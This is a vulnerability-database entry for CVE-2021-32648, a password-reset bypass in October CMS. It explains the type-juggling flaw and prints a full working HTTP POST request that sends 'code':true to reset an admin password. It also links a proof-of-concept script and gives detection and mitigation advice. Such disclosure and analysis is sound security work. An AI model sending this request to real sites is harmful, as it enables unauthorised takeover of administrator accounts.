Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
2

CVE-2021-32648

Disclosure Date: August 26, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.

Add Assessment

2
Ratings
Technical Analysis

Ovewrview

This is a simple Type Confusion / Juggling vulnerability.

October CMS will check to see if the User Supplied reset code matches the value in the database return ($this->reset_password_code == $resetCode);
If we can send a boolean value in place of a reset code we can bypass this check.

Laravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.

To exploit this vulnerability we simply need to set the Content-Type to JSON and structure our POST request accordingly. An example POST is shown below.

POST /backend/backend/auth/reset/1/[] HTTP/1.1
Host: 172.17.0.2
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.0.2
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.2/backend/backend/auth/reset/1/a
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9
Connection: close

{"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}

In the Wild

This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites – https://twitter.com/KimZetter/status/1481890639029551106

PoC

A proof of concept python script that will attempt to reset the password for the admin account has been published – https://github.com/Immersive-Labs-Sec/CVE-2021-32648

Detection

An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.

Mitigation

Applying the patches will successfully mitigate against this attack.

CVSS V3 Severity and Metrics
Base Score:
9.1 Critical
Impact Score:
5.2
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
None

General Information

Vendors

  • octobercms

Products

  • october

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis